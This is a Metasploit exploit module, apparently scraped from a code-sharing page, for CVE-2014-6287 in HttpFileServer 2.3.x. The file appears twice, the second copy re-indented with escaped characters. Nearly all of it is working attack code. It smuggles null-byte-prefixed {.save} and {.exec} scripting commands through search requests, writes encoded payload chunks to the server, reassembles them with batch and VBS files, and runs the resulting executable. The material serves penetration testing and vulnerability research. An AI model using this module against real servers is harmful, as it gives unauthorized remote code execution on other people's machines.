mubix/hfs_script_inject.rb

## hfs_script_inject.rb
##
# This module requires Metasploit: http//metasploit.com/donload
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Reank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HttpFileServer 2.3.x Remote Command Execution",
      'Description'    => %q{
         HFS is vulnerable to remote command execution attack due to a poor regex in the file
         ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass
         the filtering.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
          ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
          ['CVE', '2014-6287'],
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
      # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
        ],
      'Privileged'     => false,
      'DefaultOptions'  =>
        {
          'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
        },
      'DisclosureDate' => "Sep 14 2014",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
          OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
        ], self.class)
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{datastore['TARGETURI']}"
    })

    if res.headers['Server'] =~ /HFS 2.3/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def get_vbs_string(str)
    vbs_str = ""
    str.each_byte { |b|
      vbs_str << "Chr(#{b})+"
    }

    return vbs_str.chomp("+")
  end

  def merge_b64(filename)
    filename = datastore['SAVE_PATH'] + filename
    basename = filename.split('.')[0]
    contents = "cmd%20/c%20copy%20#{basename}.%2A.b64%20#{filename}"
    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{basename}.bat|#{contents}%0D%0A.}"
    })

    cmd = "#{basename}.bat"

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{cmd}.}"
    })
  end

  def merge_vbs(filename)
    basename = filename.split('.')[0]
    contents = "cmd%20/c%20copy%20#{basename}.%2A.vbs%20#{filename}"
    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{basename}.bat|#{contents}%0D%0A.}"
    })

    cmd = "#{basename}.bat"

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{cmd}.}"
    })
  end

  def execute_cmdstager_begin(opts)
    var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
    var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
    decoded_file = "#{var_decoded}.exe"
    encoded_file = "#{var_encoded}.b64"
    vbsname = ""
    counter = 0
    @cmd_list.each_with_index do |command, indexi|
      command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
      command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
      command.gsub!("Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37)", get_vbs_string("#{datastore['SAVE_PATH']}"))
      list = command.split(' & ')
      list.each do |cmdlet, indext|
        if cmdlet =~ /^echo\ /i
          filenum = counter.to_s.rjust(3, '0')
          counter += 1
          if cmdlet.split('>>')[1] =~ /\.vbs$/i
            vbsname = cmdlet.split('>>')[1]
          end
          filename = "#{cmdlet.split('>>')[1].split('.')[0]}.#{filenum}.#{cmdlet.split('>>')[1].split('.')[1]}"
          contents = cmdlet.split('echo ')[1].split('>>')[0]

          if contents != nil
            contents.gsub!(/\ /, '%20')
            contents.gsub!(/\+/, '%2B')
            contents.gsub!(/\=/, '%3D')
          end

          send_request_cgi({
            'method' => 'GET',
            'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{filename}|#{contents}%0D%0A.}"
          })
        end
      end
    end

    merge_b64(encoded_file)
    merge_vbs(vbsname)

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|wscript.exe%20#{vbsname}.}"
    })

    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{datastore['SAVE_PATH']}\\#{var_decoded}.exe.}"
    })

  end

  def execute_command(cmd, opts = {})

=begin
    send_request_cgi({
      'method' => 'GET',
      'uri'    => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|cmd%20/c%20#{command}.}"
      })
=end
  end

  def exploit
    execute_cmdstager({:linemax => 1500, :temp => "C:\\temp\\"})

  end
end
	##
	# This module requires Metasploit: http//metasploit.com/donload
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Reank = NormalRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::CmdStager

	def initialize(info={})
	super(update_info(info,
	'Name' => "HttpFileServer 2.3.x Remote Command Execution",
	'Description' => %q{
	HFS is vulnerable to remote command execution attack due to a poor regex in the file
	ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass
	the filtering.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
	'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
	],
	'References' =>
	[
	['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
	['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'],
	['CVE', '2014-6287'],
	],
	'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
	# Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600]
	'Platform' => 'win',
	'Targets' =>
	[
	[ 'Automatic', {} ],
	],
	'Privileged' => false,
	'DefaultOptions' =>
	{
	'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
	},
	'DisclosureDate' => "Sep 14 2014",
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
	OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
	], self.class)
	end

	def check
	res = send_request_raw({
	'method' => 'GET',
	'uri' => "#{datastore['TARGETURI']}"
	})

	if res.headers['Server'] =~ /HFS 2.3/
	return Exploit::CheckCode::Detected
	else
	return Exploit::CheckCode::Safe
	end
	end

	def get_vbs_string(str)
	vbs_str = ""
	str.each_byte { \|b\|
	vbs_str << "Chr(#{b})+"
	}

	return vbs_str.chomp("+")
	end

	def merge_b64(filename)
	filename = datastore['SAVE_PATH'] + filename
	basename = filename.split('.')[0]
	contents = "cmd%20/c%20copy%20#{basename}.%2A.b64%20#{filename}"
	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save\|#{basename}.bat\|#{contents}%0D%0A.}"
	})

	cmd = "#{basename}.bat"

	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec\|#{cmd}.}"
	})
	end

	def merge_vbs(filename)
	basename = filename.split('.')[0]
	contents = "cmd%20/c%20copy%20#{basename}.%2A.vbs%20#{filename}"
	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save\|#{basename}.bat\|#{contents}%0D%0A.}"
	})

	cmd = "#{basename}.bat"

	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec\|#{cmd}.}"
	})
	end

	def execute_cmdstager_begin(opts)
	var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
	var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
	decoded_file = "#{var_decoded}.exe"
	encoded_file = "#{var_encoded}.b64"
	vbsname = ""
	counter = 0
	@cmd_list.each_with_index do \|command, indexi\|
	command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
	command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
	command.gsub!("Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37)", get_vbs_string("#{datastore['SAVE_PATH']}"))
	list = command.split(' & ')
	list.each do \|cmdlet, indext\|
	if cmdlet =~ /^echo\ /i
	filenum = counter.to_s.rjust(3, '0')
	counter += 1
	if cmdlet.split('>>')[1] =~ /\.vbs$/i
	vbsname = cmdlet.split('>>')[1]
	end
	filename = "#{cmdlet.split('>>')[1].split('.')[0]}.#{filenum}.#{cmdlet.split('>>')[1].split('.')[1]}"
	contents = cmdlet.split('echo ')[1].split('>>')[0]

	if contents != nil
	contents.gsub!(/\ /, '%20')
	contents.gsub!(/\+/, '%2B')
	contents.gsub!(/\=/, '%3D')
	end

	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save\|#{filename}\|#{contents}%0D%0A.}"
	})
	end
	end
	end

	merge_b64(encoded_file)
	merge_vbs(vbsname)

	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec\|wscript.exe%20#{vbsname}.}"
	})

	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec\|#{datastore['SAVE_PATH']}\\#{var_decoded}.exe.}"
	})

	end

	def execute_command(cmd, opts = {})

	=begin
	send_request_cgi({
	'method' => 'GET',
	'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec\|cmd%20/c%20#{command}.}"
	})
	=end
	end

	def exploit
	execute_cmdstager({:linemax => 1500, :temp => "C:\\temp\\"})

	end
	end